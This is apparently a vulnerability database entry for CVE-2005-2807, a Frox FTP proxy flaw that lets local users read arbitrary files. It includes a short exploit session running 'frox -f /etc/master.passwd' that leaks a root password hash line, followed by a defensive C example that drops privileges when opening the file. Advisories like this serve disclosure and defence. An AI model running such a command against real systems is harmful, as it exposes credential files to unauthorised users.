Frox arbitrary configuration file access vulnerability

Vulnerability ID: 1109047    Vulnerability type: Input validation
Published: 2005-09-01    Updated: 2005-10-20
CVE ID: CVE-2005-2807
CNNVD-ID: CNNVD-200509-060
Platform: Linux    CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/26218
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-060
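|Vulnerability details
Frox is an open-source transparent FTP proxy that runs on BSD and other operating systems that use ipfilter. frox 0.7.18, when running setuid root, does not correctly drop privileges when reading its configuration file, so a local user can read portions of arbitrary files via the -f command-line option.
|Exploit (EXP)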
source: http://www.securityfocus.com/bid/14711/info

Frox is prone to a vulnerability that permits read access to arbitrary files.

Successful exploitation of this vulnerability will grant the attacker read access to arbitrary files on the system in the security context of the Frox process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.

It should be noted that this issue is only exploitable if Frox is installed with setuid or setgid privileges. 

mq(/usr/local/sbin)-> frox -f /etc/master.passwd
Unrecognised option
"root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie"
at line 3 of /etc/master.passwd
Error reading configuration file
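
A defensive pattern for the flaw described above, as an added example (not code from Frox or the advisory, and not the project's actual fix): a setuid or setgid program opens a path supplied through an option such as -f with the invoking user's credentials, so the kernel refuses files that user could not read. The helper name open_config_as_invoker and the default path /dev/null are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical helper: open a user-supplied config path using the invoking
 * user's credentials rather than the setuid/setgid ones.
 * Returns a read-only fd, or -1 with errno set by the failing call. */
int open_config_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first: once the euid is unprivileged, setegid() could fail. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        saved_errno = errno;
        if (setegid(saved_egid) != 0)
            abort();
        errno = saved_errno;
        return -1;
    }

    /* The kernel now checks read permission against the real uid/gid. */
    fd = open(path, O_RDONLY | O_CLOEXEC);
    saved_errno = errno;

    /* Regain the saved IDs (user first, then group); stop if that fails. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0)
        abort();
    errno = saved_errno;
    return fd;
}

int main(int argc, char **argv)
{
    /* Constructed default path; pass another path as the first argument. */
    int fd = open_config_as_invoker(argc > 1 ? argv[1] : "/dev/null");
    if (fd < 0) {
        perror("open_config_as_invoker");
        return 1;
    }
    close(fd);
    return 0;
}
```

Because the descriptor is opened as the invoking user, a parser that echoes an unrecognised line, as in the session above, can only show data that user could already read.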
|References

Source: BID
Name: 14711
Link: http://www.securityfocus.com/bid/14711
Source: BUGTRAQ
Name: 20050901Filearibitaryreadaccessinfrox
Link: http://www.securityfocus.com/archive/1/409667